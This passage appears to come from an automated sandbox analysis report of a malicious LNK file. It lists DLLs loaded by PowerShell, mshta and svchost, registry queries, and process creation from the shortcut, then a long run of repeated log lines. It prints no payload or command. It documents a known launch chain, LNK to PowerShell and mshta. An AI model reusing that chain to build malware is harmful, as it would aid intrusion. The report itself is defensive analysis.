Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: HngJMpDqxP.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
